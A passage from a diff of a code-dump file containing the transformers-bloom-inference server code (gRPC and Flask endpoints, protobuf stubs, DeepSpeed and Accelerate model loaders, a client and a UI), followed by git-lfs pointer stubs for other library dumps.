+ from ...utils import ForwardRequest, TokenizeRequest, create_generate_request, print_rank_0
653
+ from .pb import generation_pb2, generation_pb2_grpc
654
+
655
+ class GenerationServer(generation_pb2_grpc.GenerationServiceServicer):
656
+
657
+ def __init__(self, model: Model) -> None:
658
+ self.model = model
659
+
660
+ def _unpack_proto_query_kwargs(self, query_kwargs):
661
+ query_kwargs = {k: getattr(v, v.WhichOneof('oneof_values')) for (k, v) in query_kwargs.items()}
662
+ return query_kwargs
663
+
664
+ def Generate(self, request, context):
665
+ text = [r for r in request.texts]
666
+ generate_kwargs = self._unpack_proto_query_kwargs(request.generate_kwargs)
667
+ request = create_generate_request(text=text, generate_kwargs=generate_kwargs)
668
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
669
+ torch.cuda.set_device(local_rank)
670
+ self.model.input_device = local_rank
671
+ response = self.model.generate(request)
672
+ if isinstance(response, Exception):
673
+ response = generation_pb2.GenerationResponseProto(error=str(response), is_encoder_decoder=response.is_encoder_decoder)
674
+ else:
675
+ response = generation_pb2.GenerationResponseProto(texts=response.text, num_generated_tokens=response.num_generated_tokens, is_encoder_decoder=response.is_encoder_decoder)
676
+ return response
677
+
678
+ def Forward(self, request, context):
679
+ conditioning_text = [r for r in request.conditioning_text]
680
+ response = [r for r in request.response]
681
+ request = ForwardRequest(conditioning_text=conditioning_text, response=response)
682
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
683
+ torch.cuda.set_device(local_rank)
684
+ self.model.input_device = local_rank
685
+ response = self.model.forward(request)
686
+ if isinstance(response, Exception):
687
+ response = generation_pb2.ForwardResponseProto(error=str(response), is_encoder_decoder=response.is_encoder_decoder)
688
+ else:
689
+ response = generation_pb2.ForwardResponseProto(nll=response.nll, is_encoder_decoder=response.is_encoder_decoder)
690
+ return response
691
+
692
+ def serve(inference_pipeline, port):
693
+ server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
694
+ generation_pb2_grpc.add_GenerationServiceServicer_to_server(GenerationServer(inference_pipeline), server)
695
+ server.add_insecure_port(f'[::]:{port}')
696
+ print_rank_0('About to start server')
697
+ server.start()
698
+ print_rank_0('Started')
699
+ server.wait_for_termination()
700
+
701
+ # File: transformers-bloom-inference-main/inference_server/model_handler/grpc_utils/pb/generation_pb2.py
702
+ """"""
703
+ from google.protobuf import descriptor as _descriptor
704
+ from google.protobuf import descriptor_pool as _descriptor_pool
705
+ from google.protobuf import symbol_database as _symbol_database
706
+ from google.protobuf.internal import builder as _builder
707
+ _sym_db = _symbol_database.Default()
708
+ DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x10generation.proto\x12\ngeneration"_\n\x05Value\x12\x10\n\x06svalue\x18\x01 \x01(\tH\x00\x12\x10\n\x06ivalue\x18\x02 \x01(\x03H\x00\x12\x10\n\x06fvalue\x18\x03 \x01(\x02H\x00\x12\x10\n\x06bvalue\x18\x04 \x01(\x08H\x00B\x0e\n\x0coneof_values"\xc2\x01\n\x16GenerationRequestProto\x12\r\n\x05texts\x18\x01 \x03(\t\x12O\n\x0fgenerate_kwargs\x18\x02 \x03(\x0b26.generation.GenerationRequestProto.GenerateKwargsEntry\x1aH\n\x13GenerateKwargsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12 \n\x05value\x18\x02 \x01(\x0b2\x11.generation.Value:\x028\x01"q\n\x17GenerationResponseProto\x12\r\n\x05texts\x18\x01 \x03(\t\x12\x1c\n\x14num_generated_tokens\x18\x02 \x03(\x05\x12\r\n\x05error\x18\x03 \x01(\t\x12\x1a\n\x12is_encoder_decoder\x18\x04 \x01(\x08"B\n\x13ForwardRequestProto\x12\x19\n\x11conditioning_text\x18\x01 \x03(\t\x12\x10\n\x08response\x18\x02 \x03(\t"N\n\x14ForwardResponseProto\x12\x0b\n\x03nll\x18\x01 \x01(\x02\x12\r\n\x05error\x18\x02 \x01(\t\x12\x1a\n\x12is_encoder_decoder\x18\x03 \x01(\x082\xba\x01\n\x11GenerationService\x12U\n\x08Generate\x12".generation.GenerationRequestProto\x1a#.generation.GenerationResponseProto"\x00\x12N\n\x07Forward\x12\x1f.generation.ForwardRequestProto\x1a .generation.ForwardResponseProto"\x00b\x06proto3')
709
+ _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals())
710
+ _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'generation_pb2', globals())
711
+ if _descriptor._USE_C_DESCRIPTORS == False:
712
+ DESCRIPTOR._options = None
713
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._options = None
714
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._serialized_options = b'8\x01'
715
+ _VALUE._serialized_start = 32
716
+ _VALUE._serialized_end = 127
717
+ _GENERATIONREQUESTPROTO._serialized_start = 130
718
+ _GENERATIONREQUESTPROTO._serialized_end = 324
719
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._serialized_start = 252
720
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._serialized_end = 324
721
+ _GENERATIONRESPONSEPROTO._serialized_start = 326
722
+ _GENERATIONRESPONSEPROTO._serialized_end = 439
723
+ _FORWARDREQUESTPROTO._serialized_start = 441
724
+ _FORWARDREQUESTPROTO._serialized_end = 507
725
+ _FORWARDRESPONSEPROTO._serialized_start = 509
726
+ _FORWARDRESPONSEPROTO._serialized_end = 587
727
+ _GENERATIONSERVICE._serialized_start = 590
728
+ _GENERATIONSERVICE._serialized_end = 776
729
+
730
+ # File: transformers-bloom-inference-main/inference_server/model_handler/grpc_utils/pb/generation_pb2_grpc.py
731
+ """"""
732
+ import grpc
733
+ from . import generation_pb2 as generation__pb2
734
+
735
+ class GenerationServiceStub(object):
736
+
737
+ def __init__(self, channel):
738
+ self.Generate = channel.unary_unary('/generation.GenerationService/Generate', request_serializer=generation__pb2.GenerationRequestProto.SerializeToString, response_deserializer=generation__pb2.GenerationResponseProto.FromString)
739
+ self.Forward = channel.unary_unary('/generation.GenerationService/Forward', request_serializer=generation__pb2.ForwardRequestProto.SerializeToString, response_deserializer=generation__pb2.ForwardResponseProto.FromString)
740
+
741
+ class GenerationServiceServicer(object):
742
+
743
+ def Generate(self, request, context):
744
+ context.set_code(grpc.StatusCode.UNIMPLEMENTED)
745
+ context.set_details('Method not implemented!')
746
+ raise NotImplementedError('Method not implemented!')
747
+
748
+ def Forward(self, request, context):
749
+ context.set_code(grpc.StatusCode.UNIMPLEMENTED)
750
+ context.set_details('Method not implemented!')
751
+ raise NotImplementedError('Method not implemented!')
752
+
753
+ def add_GenerationServiceServicer_to_server(servicer, server):
754
+ rpc_method_handlers = {'Generate': grpc.unary_unary_rpc_method_handler(servicer.Generate, request_deserializer=generation__pb2.GenerationRequestProto.FromString, response_serializer=generation__pb2.GenerationResponseProto.SerializeToString), 'Forward': grpc.unary_unary_rpc_method_handler(servicer.Forward, request_deserializer=generation__pb2.ForwardRequestProto.FromString, response_serializer=generation__pb2.ForwardResponseProto.SerializeToString)}
755
+ generic_handler = grpc.method_handlers_generic_handler('generation.GenerationService', rpc_method_handlers)
756
+ server.add_generic_rpc_handlers((generic_handler,))
757
+
758
+ class GenerationService(object):
759
+
760
+ @staticmethod
761
+ def Generate(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
762
+ return grpc.experimental.unary_unary(request, target, '/generation.GenerationService/Generate', generation__pb2.GenerationRequestProto.SerializeToString, generation__pb2.GenerationResponseProto.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
763
+
764
+ @staticmethod
765
+ def Forward(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
766
+ return grpc.experimental.unary_unary(request, target, '/generation.GenerationService/Forward', generation__pb2.ForwardRequestProto.SerializeToString, generation__pb2.ForwardResponseProto.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
767
+
768
+ # File: transformers-bloom-inference-main/inference_server/model_handler/launch.py
769
+ """"""
770
+ import argparse
771
+ import torch.distributed as dist
772
+ from ..models import get_model_class, start_inference_engine
773
+ from ..utils import get_argument_parser, parse_args
774
+ from .grpc_utils.generation_server import serve
775
+
776
+ def get_args() -> argparse.Namespace:
777
+ parser = get_argument_parser()
778
+ group = parser.add_argument_group(title='launch config')
779
+ group.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
780
+ group.add_argument('--cpu_offload', action='store_true', help='whether to activate CPU offload for DS ZeRO')
781
+ group.add_argument('--ports', nargs='+', help='GRPC ports')
782
+ args = parse_args(parser)
783
+ return args
784
+
785
+ def main():
786
+ args = get_args()
787
+ start_inference_engine(args.deployment_framework)
788
+ model = get_model_class(args.deployment_framework)(args)
789
+ serve(model, args.ports[dist.get_rank()])
790
+ if __name__ == '__main__':
791
+ main()
792
+
793
+ # File: transformers-bloom-inference-main/inference_server/models/__init__.py
794
+ from ..constants import DS_INFERENCE, DS_ZERO, HF_ACCELERATE, HF_CPU
795
+ from .model import Model, get_hf_model_class, load_tokenizer
796
+
797
+ def get_model_class(deployment_framework: str):
798
+ if deployment_framework == HF_ACCELERATE:
799
+ from .hf_accelerate import HFAccelerateModel
800
+ return HFAccelerateModel
801
+ elif deployment_framework == HF_CPU:
802
+ from .hf_cpu import HFCPUModel
803
+ return HFCPUModel
804
+ elif deployment_framework == DS_INFERENCE:
805
+ from .ds_inference import DSInferenceModel
806
+ return DSInferenceModel
807
+ elif deployment_framework == DS_ZERO:
808
+ from .ds_zero import DSZeROModel
809
+ return DSZeROModel
810
+ else:
811
+ raise ValueError(f'Unknown deployment framework {deployment_framework}')
812
+
813
+ def start_inference_engine(deployment_framework: str) -> None:
814
+ if deployment_framework in [DS_INFERENCE, DS_ZERO]:
815
+ import deepspeed
816
+ deepspeed.init_distributed('nccl')
817
+
818
+ # File: transformers-bloom-inference-main/inference_server/models/ds_inference.py
819
+ import glob
820
+ import io
821
+ import json
822
+ import os
823
+ from argparse import Namespace
824
+ from functools import partial
825
+ import torch
826
+ import deepspeed
827
+ from huggingface_hub import try_to_load_from_cache
828
+ from transformers import AutoConfig
829
+ from ..utils import get_world_size, run_rank_n
830
+ from .model import Model, get_hf_model_class
831
+
832
+ class DSInferenceModel(Model):
833
+
834
+ def __init__(self, args: Namespace) -> None:
835
+ super().__init__(args)
836
+ with deepspeed.OnDevice(dtype=torch.float16, device='meta'):
837
+ self.model = get_hf_model_class(args.model_class).from_config(AutoConfig.from_pretrained(args.model_name), torch_dtype=torch.bfloat16)
838
+ self.model = self.model.eval()
839
+ downloaded_model_path = get_model_path(args.model_name)
840
+ if args.dtype in [torch.float16, torch.int8]:
841
+ checkpoints_json = os.path.join(downloaded_model_path, 'ds_inference_config.json')
842
+ if os.path.isfile(checkpoints_json):
843
+ self.model = deepspeed.init_inference(self.model, mp_size=get_world_size(), base_dir=downloaded_model_path, dtype=args.dtype, checkpoint=checkpoints_json, replace_with_kernel_inject=True)
844
+ else:
845
+ with TemporaryCheckpointsJSON(downloaded_model_path) as checkpoints_json:
846
+ self.model = deepspeed.init_inference(self.model, mp_size=get_world_size(), base_dir=downloaded_model_path, dtype=args.dtype, checkpoint=checkpoints_json, replace_with_kernel_inject=True)
847
+ elif args.dtype == torch.bfloat16:
848
+ raise NotImplementedError('bfloat16 is not yet supported')
849
+ self.model = self.model.module
850
+ self.input_device = torch.cuda.current_device()
851
+ self.post_init(args.model_name)
852
+
853
+ class TemporaryCheckpointsJSON:
854
+
855
+ def __init__(self, model_path: str):
856
+ self.tmp_directory = 'tmp'
857
+ self.tmp_file = os.path.join(self.tmp_directory, 'checkpoints.json')
858
+ self.model_path = model_path
859
+
860
+ def write_checkpoints_json(self) -> None:
861
+ print(self.model_path)
862
+ with io.open(self.tmp_file, 'w', encoding='utf-8') as f:
863
+ data = {'type': 'BLOOM', 'checkpoints': glob.glob(f'{self.model_path}/*.bin'), 'version': 1.0}
864
+ json.dump(data, f)
865
+
866
+ def __enter__(self):
867
+ run_rank_n(os.makedirs, barrier=True)(self.tmp_directory, exist_ok=True)
868
+ run_rank_n(self.write_checkpoints_json, barrier=True)()
869
+ return self.tmp_file
870
+
871
+ def __exit__(self, type, value, traceback):
872
+ return
873
+
874
+ def get_model_path(model_name: str):
875
+ try:
876
+ config_file = 'config.json'
877
+ config_path = try_to_load_from_cache(model_name, config_file, cache_dir=os.getenv('TRANSFORMERS_CACHE'))
878
+ if config_path is None:
879
+ return model_name
880
+ else:
881
+ return os.path.dirname(config_path)
882
+ except:
883
+ return model_name
884
+
885
+ # File: transformers-bloom-inference-main/inference_server/models/ds_zero.py
886
+ from argparse import Namespace
887
+ import torch
888
+ import deepspeed
889
+ from transformers import AutoConfig
890
+ from transformers.deepspeed import HfDeepSpeedConfig
891
+ from ..utils import get_world_size
892
+ from .model import Model, get_hf_model_class
893
+
894
+ class DSZeROModel(Model):
895
+
896
+ def __init__(self, args: Namespace) -> None:
897
+ super().__init__(args)
898
+ config = AutoConfig.from_pretrained(args.model_name)
899
+ train_micro_batch_size_per_gpu = 1
900
+ train_batch_size = train_micro_batch_size_per_gpu * get_world_size()
901
+ ds_config = {'fp16': {'enabled': args.dtype == torch.float16}, 'bf16': {'enabled': args.dtype == torch.bfloat16}, 'zero_optimization': {'stage': 3, 'overlap_comm': True, 'contiguous_gradients': True, 'reduce_bucket_size': config.hidden_size * config.hidden_size, 'stage3_prefetch_bucket_size': 0.9 * config.hidden_size * config.hidden_size, 'stage3_param_persistence_threshold': 0}, 'steps_per_print': 2000, 'train_batch_size': train_batch_size, 'train_micro_batch_size_per_gpu': train_micro_batch_size_per_gpu, 'wall_clock_breakdown': False}
902
+ if args.cpu_offload:
903
+ ds_config['zero_optimization']['offload_param'] = {'device': 'cpu', 'pin_memory': True}
904
+ dschf = HfDeepSpeedConfig(ds_config)
905
+ self.model = get_hf_model_class(args.model_class).from_pretrained(args.model_name, torch_dtype=args.dtype)
906
+ self.model = self.model.eval()
907
+ self.model = deepspeed.initialize(model=self.model, config_params=ds_config)[0]
908
+ self.model.module.eval()
909
+ self.model = self.model.module
910
+ self.input_device = torch.cuda.current_device()
911
+ self.post_init(args.model_name)
912
+
913
+ # File: transformers-bloom-inference-main/inference_server/models/hf_accelerate.py
914
+ from argparse import Namespace
915
+ import torch
916
+ from ..utils import get_world_size
917
+ from .model import Model, get_hf_model_class
918
+
919
+ class HFAccelerateModel(Model):
920
+
921
+ def __init__(self, args: Namespace) -> None:
922
+ super().__init__(args)
923
+ kwargs = {'pretrained_model_name_or_path': args.model_name, 'device_map': 'auto'}
924
+ if get_world_size() > 1:
925
+ kwargs['device_map'] = 'balanced_low_0'
926
+ if args.dtype == torch.int8:
927
+ kwargs['load_in_8bit'] = True
928
+ else:
929
+ kwargs['torch_dtype'] = args.dtype
930
+ self.model = get_hf_model_class(args.model_class).from_pretrained(**kwargs)
931
+ self.model.requires_grad_(False)
932
+ self.model.eval()
933
+ self.input_device = 'cuda:0'
934
+ self.post_init(args.model_name)
935
+
936
+ # File: transformers-bloom-inference-main/inference_server/models/model.py
937
+ import argparse
938
+ import copy
939
+ from typing import List, Union
940
+ import torch
941
+ import transformers
942
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoModelForSeq2SeqLM, AutoTokenizer, GenerationConfig
943
+ from ..utils import ForwardRequest, ForwardResponse, GenerateRequest, GenerateResponse, TokenizeRequest, TokenizeResponse
944
+
945
+ class Model:
946
+
947
+ def __init__(self, args: argparse.Namespace) -> None:
948
+ self.model = None
949
+ self.input_device = None
950
+ self.max_input_length = args.max_input_length
951
+ self.max_batch_size = args.max_batch_size
952
+
953
+ def post_init(self, model_name: str) -> None:
954
+ self.is_encoder_decoder = AutoConfig.from_pretrained(model_name).is_encoder_decoder
955
+ self.generation_config = GenerationConfig.from_model_config(AutoConfig.from_pretrained(model_name))
956
+ self.tokenizer = load_tokenizer(model_name)
957
+ self.pad = self.tokenizer.pad_token_id
958
+ self.prefix_token_id = self.tokenizer('A')['input_ids'][0]
959
+
960
+ def get_generation_config(self, request: GenerateRequest) -> GenerationConfig:
961
+ generation_config = copy.deepcopy(self.generation_config)
962
+ request = dict(request)
963
+ request_filtered = {}
964
+ for (key, value) in request.items():
965
+ if value is not None and key not in ['text', 'remove_input_from_output']:
966
+ request_filtered[key] = value
967
+ request_filtered['return_dict_in_generate'] = True
968
+ generation_config.update(**request_filtered)
969
+ return generation_config
970
+
971
+ def generate(self, request: GenerateRequest) -> Union[GenerateResponse, Exception]:
972
+ try:
973
+ batch_size = len(request.text)
974
+ check_batch_size(batch_size, self.max_batch_size)
975
+ input_tokens = self.tokenizer(request.text, return_tensors='pt', padding=True)
976
+ max_input_length_in_batch = input_tokens.input_ids[0].shape[0]
977
+ check_max_input_length(max_input_length_in_batch, self.max_input_length)
978
+ for t in input_tokens:
979
+ if torch.is_tensor(input_tokens[t]):
980
+ input_tokens[t] = input_tokens[t].to(self.input_device)
981
+ num_input_tokens = input_tokens['input_ids'].shape[1]
982
+ generation_config = self.get_generation_config(request)
983
+ output = self.model.generate(**input_tokens, generation_config=generation_config)
984
+ output_tokens = output.sequences
985
+ if self.is_encoder_decoder:
986
+ num_generated_tokens = (output_tokens != self.pad).sum(dim=-1).tolist()
987
+ generated_text = self.tokenizer.batch_decode(output_tokens, skip_special_tokens=True)
988
+ else:
989
+ generated_tokens = output_tokens[:, num_input_tokens:]
990
+ num_generated_tokens = (generated_tokens != self.pad).sum(dim=-1).tolist()
991
+ if request.remove_input_from_output:
992
+ prefix_to_add = torch.tensor([[self.prefix_token_id]] * batch_size).to(self.input_device)
993
+ generated_tokens = torch.cat([prefix_to_add, generated_tokens], dim=1)
994
+ generated_text = self.tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
995
+ generated_text = [i[1:] for i in generated_text]
996
+ else:
997
+ generated_text = self.tokenizer.batch_decode(output_tokens, skip_special_tokens=True)
998
+ return GenerateResponse(text=generated_text, num_generated_tokens=num_generated_tokens, is_encoder_decoder=self.is_encoder_decoder)
999
+ except Exception as exception:
1000
+ return exception
1001
+
1002
+ def forward(self, request: ForwardRequest) -> Union[ForwardResponse, Exception]:
1003
+
1004
+ def prepare_tensors(conditioning_tokens: List[List[int]], response_tokens: List[List[int]]):
1005
+ bs = len(conditioning_tokens)
1006
+ input_ids = [conditioning_tokens[i] + response_tokens[i] for i in range(bs)]
1007
+ attention_mask = [[1] * (len(conditioning_tokens[i]) + len(response_tokens[i])) for i in range(bs)]
1008
+ labels = [[-100] * len(conditioning_tokens[i]) + response_tokens[i] for i in range(bs)]
1009
+ input_ids = pad(input_ids, self.tokenizer.pad_token_id)
1010
+ attention_mask = pad(attention_mask, 0)
1011
+ labels = pad(labels, -100)
1012
+ return {'input_ids': torch.tensor(input_ids), 'attention_mask': torch.tensor(attention_mask), 'labels': torch.tensor(labels)}
1013
+
1014
+ def pad(arrays: list, padding: int, max_length: int=None):
1015
+ if max_length is None:
1016
+ max_length = max(list(map(len, arrays)))
1017
+ arrays = [[padding] * (max_length - len(array)) + array for array in arrays]
1018
+ return arrays
1019
+ try:
1020
+ batch_size = len(request.conditioning_text)
1021
+ check_batch_size(batch_size, self.max_batch_size)
1022
+ conditioning_tokens = self.tokenizer(request.conditioning_text)['input_ids']
1023
+ response_tokens = self.tokenizer(request.response)['input_ids']
1024
+ max_length_in_batch = max([len(conditioning_tokens) + len(response_tokens)])
1025
+ check_max_input_length(max_length_in_batch, self.max_input_length)
1026
+ input_tokens = prepare_tensors(conditioning_tokens, response_tokens)
1027
+ for t in input_tokens:
1028
+ if torch.is_tensor(input_tokens[t]):
1029
+ input_tokens[t] = input_tokens[t].to(self.input_device)
1030
+ loss = self.model(**input_tokens).loss
1031
+ return ForwardResponse(nll=loss.item(), is_encoder_decoder=self.is_encoder_decoder)
1032
+ except Exception as exception:
1033
+ return exception
1034
+
1035
+ def tokenize(self, request: TokenizeRequest) -> TokenizeResponse:
1036
+ return TokenizeResponse(token_ids=self.tokenizer(request.text).input_ids, is_encoder_decoder=self.is_encoder_decoder)
1037
+
1038
+ def check_max_input_length(input_token_length: int, max_input_length: int) -> None:
1039
+ if max_input_length is None:
1040
+ return
1041
+ if input_token_length > max_input_length:
1042
+ raise Exception(f'max supported input length = {max_input_length} for now')
1043
+
1044
+ def check_batch_size(batch_size: int, max_batch_size: int) -> None:
1045
+ if max_batch_size is None:
1046
+ return
1047
+ if batch_size > max_batch_size:
1048
+ raise Exception(f'max supported batch size = {max_batch_size} for now')
1049
+
1050
+ def get_hf_model_class(model_class: str) -> Union[AutoModelForCausalLM, AutoModelForSeq2SeqLM]:
1051
+ return getattr(transformers, model_class)
1052
+
1053
+ def load_tokenizer(model_name: str) -> AutoTokenizer:
1054
+ tokenizer = AutoTokenizer.from_pretrained(model_name, padding_side='left')
1055
+ if tokenizer.pad_token_id is None:
1056
+ tokenizer.add_special_tokens({'pad_token': '[PAD]'})
1057
+ return tokenizer
1058
+
1059
+ # File: transformers-bloom-inference-main/inference_server/server.py
1060
+ import os
1061
+ from functools import partial
1062
+ from flask import Flask, request
1063
+ from flask_api import status
1064
+ from pydantic import BaseModel
1065
+ from .constants import HF_ACCELERATE
1066
+ from .model_handler.deployment import ModelDeployment
1067
+ from .utils import ForwardRequest, GenerateRequest, TokenizeRequest, get_exception_response, get_num_tokens_to_generate, get_torch_dtype, parse_bool, run_and_log_time
1068
+
1069
+ class QueryID(BaseModel):
1070
+ generate_query_id: int = 0
1071
+ tokenize_query_id: int = 0
1072
+ forward_query_id: int = 0
1073
+
1074
+ class Args:
1075
+
1076
+ def __init__(self) -> None:
1077
+ self.deployment_framework = os.getenv('DEPLOYMENT_FRAMEWORK', HF_ACCELERATE)
1078
+ self.model_name = os.getenv('MODEL_NAME')
1079
+ self.model_class = os.getenv('MODEL_CLASS')
1080
+ self.dtype = get_torch_dtype(os.getenv('DTYPE'))
1081
+ self.allowed_max_new_tokens = int(os.getenv('ALLOWED_MAX_NEW_TOKENS', 100))
1082
+ self.max_input_length = int(os.getenv('MAX_INPUT_LENGTH', 512))
1083
+ self.max_batch_size = int(os.getenv('MAX_BATCH_SIZE', 4))
1084
+ self.debug = parse_bool(os.getenv('DEBUG', 'false'))
1085
+ args = Args()
1086
+ model = ModelDeployment(args, True)
1087
+ query_ids = QueryID()
1088
+ app = Flask(__name__)
1089
+
1090
+ @app.route('/query_id/', methods=['GET'])
1091
+ def query_id():
1092
+ return (query_ids.dict(), status.HTTP_200_OK)
1093
+
1094
+ @app.route('/tokenize/', methods=['POST'])
1095
+ def tokenize():
1096
+ try:
1097
+ x = request.get_json()
1098
+ x = TokenizeRequest(**x)
1099
+ (response, total_time_taken) = run_and_log_time(partial(model.tokenize, request=x))
1100
+ response.query_id = query_ids.tokenize_query_id
1101
+ query_ids.tokenize_query_id += 1
1102
+ response.total_time_taken = '{:.2f} msecs'.format(total_time_taken * 1000)
1103
+ return (response.dict(), status.HTTP_200_OK)
1104
+ except Exception:
1105
+ response = get_exception_response(query_ids.tokenize_query_id, args.debug)
1106
+ query_ids.tokenize_query_id += 1
1107
+ return (response, status.HTTP_500_INTERNAL_SERVER_ERROR)
1108
+
1109
+ @app.route('/generate/', methods=['POST'])
1110
+ def generate():
1111
+ try:
1112
+ x = request.get_json()
1113
+ x = GenerateRequest(**x)
1114
+ x.max_new_tokens = get_num_tokens_to_generate(x.max_new_tokens, args.allowed_max_new_tokens)
1115
+ (response, total_time_taken) = run_and_log_time(partial(model.generate, request=x))
1116
+ response.query_id = query_ids.generate_query_id
1117
+ query_ids.generate_query_id += 1
1118
+ response.total_time_taken = '{:.2f} secs'.format(total_time_taken)
1119
+ return (response.dict(), status.HTTP_200_OK)
1120
+ except Exception:
1121
+ response = get_exception_response(query_ids.generate_query_id, args.debug)
1122
+ query_ids.generate_query_id += 1
1123
+ return (response, status.HTTP_500_INTERNAL_SERVER_ERROR)
1124
+
1125
+ @app.route('/forward/', methods=['POST'])
1126
+ def forward():
1127
+ try:
1128
+ x = request.get_json()
1129
+ x = ForwardRequest(**x)
1130
+ if len(x.conditioning_text) != len(x.response):
1131
+ raise Exception('unequal number of elements in conditioning_text and response arguments')
1132
+ (response, total_time_taken) = run_and_log_time(partial(model.forward, request=x))
1133
+ response.query_id = query_ids.forward_query_id
1134
+ query_ids.forward_query_id += 1
1135
+ response.total_time_taken = '{:.2f} secs'.format(total_time_taken)
1136
+ return (response.dict(), status.HTTP_200_OK)
1137
+ except Exception:
1138
+ response = get_exception_response(query_ids.forward_query_id, args.debug)
1139
+ query_ids.forward_query_id += 1
1140
+ return (response, status.HTTP_500_INTERNAL_SERVER_ERROR)
1141
+
1142
+ # File: transformers-bloom-inference-main/server_request.py
1143
+ import argparse
1144
+ import requests
1145
+
1146
+ def get_args() -> argparse.Namespace:
1147
+ parser = argparse.ArgumentParser()
1148
+ group = parser.add_argument_group(title='launch config')
1149
+ group.add_argument('--host', type=str, required=True, help='host address')
1150
+ group.add_argument('--port', type=int, required=True, help='port number')
1151
+ return parser.parse_args()
1152
+
1153
+ def generate(url: str) -> None:
1154
+ url = url + '/generate/'
1155
+ request_body = {'text': ['DeepSpeed', 'DeepSpeed is a', 'DeepSpeed is a machine', 'DeepSpeed is a machine learning framework'], 'max_new_tokens': 40}
1156
+ response = requests.post(url=url, json=request_body, verify=False)
1157
+ print(response.json(), '\n')
1158
+
1159
+ def tokenize(url: str) -> None:
1160
+ url = url + '/tokenize/'
1161
+ request_body = {'text': ['DeepSpeed is a', 'DeepSpeed is a machine learning framework']}
1162
+ response = requests.post(url=url, json=request_body, verify=False)
1163
+ print(response.json(), '\n')
1164
+
1165
+ def forward(url: str) -> None:
1166
+ url = url + '/forward/'
1167
+ request_body = {'conditioning_text': ['DeepSpeed', 'DeepSpeed is a', 'DeepSpeed is a machine', 'DeepSpeed is a machine learning framework'], 'response': ['DeepSpeed', 'DeepSpeed is a', 'DeepSpeed is a machine', 'DeepSpeed is a machine learning framework']}
1168
+ response = requests.post(url=url, json=request_body, verify=False)
1169
+ print(response.json(), '\n')
1170
+
1171
+ def query_id(url: str) -> None:
1172
+ url = url + '/query_id/'
1173
+ response = requests.get(url=url, verify=False)
1174
+ print(response.json(), '\n')
1175
+
1176
+ def main():
1177
+ args = get_args()
1178
+ url = 'http://{}:{}'.format(args.host, args.port)
1179
+ generate(url)
1180
+ tokenize(url)
1181
+ forward(url)
1182
+ query_id(url)
1183
+ if __name__ == '__main__':
1184
+ main()
1185
+
1186
+ # File: transformers-bloom-inference-main/ui.py
1187
+ import argparse
1188
+ import requests
1189
+ from fastapi import FastAPI, Request
1190
+ from fastapi.middleware.cors import CORSMiddleware
1191
+ from fastapi.responses import HTMLResponse, JSONResponse
1192
+ from fastapi.routing import APIRoute, Mount
1193
+ from fastapi.staticfiles import StaticFiles
1194
+ from fastapi.templating import Jinja2Templates
1195
+ from transformers import AutoTokenizer
1196
+ from uvicorn import run
1197
+
1198
+ def get_args() -> argparse.Namespace:
1199
+ parser = argparse.ArgumentParser()
1200
+ group = parser.add_argument_group(title='launch config')
1201
+ group.add_argument('--ui_host', type=str, default='127.0.0.1', help='host address for UI')
1202
+ group.add_argument('--ui_port', type=int, default=5001, help='port number for UI')
1203
+ group.add_argument('--generation_backend_host', type=str, default='127.0.0.1', help='host address for generation server')
1204
+ group.add_argument('--generation_backend_port', type=int, default=5000, help='port number for generation server')
1205
+ return parser.parse_args()
1206
+
1207
+ class Server:
1208
+
1209
+ def __init__(self, args: argparse.Namespace):
1210
+ self.templates = Jinja2Templates(directory='templates')
1211
+ self.ui_host = args.ui_host
1212
+ self.ui_port = args.ui_port
1213
+ self.generation_backend_host = args.generation_backend_host
1214
+ self.generation_backend_port = args.generation_backend_port
1215
+ self.workers = 1
1216
+ self.tokenizer = AutoTokenizer.from_pretrained('bigscience/bloom')
1217
+ self.app = FastAPI(routes=[APIRoute('/', self.homepage, methods=['GET'], response_class=HTMLResponse), APIRoute('/generate/', self.generate, methods=['POST']), Mount('/static/', StaticFiles(directory='static'), name='static')], timeout=600)
1218
+ self.prefix_checkpoints_list = None
1219
+
1220
+ def homepage(self, request: Request) -> HTMLResponse:
1221
+ return self.templates.TemplateResponse('index.html', {'request': request})
1222
+
1223
+ def generate(self, request: dict) -> JSONResponse:
1224
+ response = requests.post(f'http://{self.generation_backend_host}:{self.generation_backend_port}/generate', json=request, verify=False)
1225
+ return JSONResponse(content=response.json())
1226
+
1227
+ def run(self):
1228
+ self.app.add_middleware(CORSMiddleware, allow_origins=['*'], allow_credentials=True, allow_methods=['*'], allow_headers=['*'])
1229
+ run(self.app, host=self.ui_host, port=self.ui_port, workers=self.workers)
1230
+
1231
+ def main() -> None:
1232
+ Server(get_args()).run()
1233
+ if __name__ == '__main__':
1234
+ main()
1235
+
huggingface_transformers.txt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:96463b4eac366e4845986ebecddde94c861630a3a1f135e63c0b4e1026a53f3a
3
+ size 27122779
huggingface_trl.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_keras.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_matplotlib.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_numpy.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_opencv.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_pandas.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_plotly.py.txt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
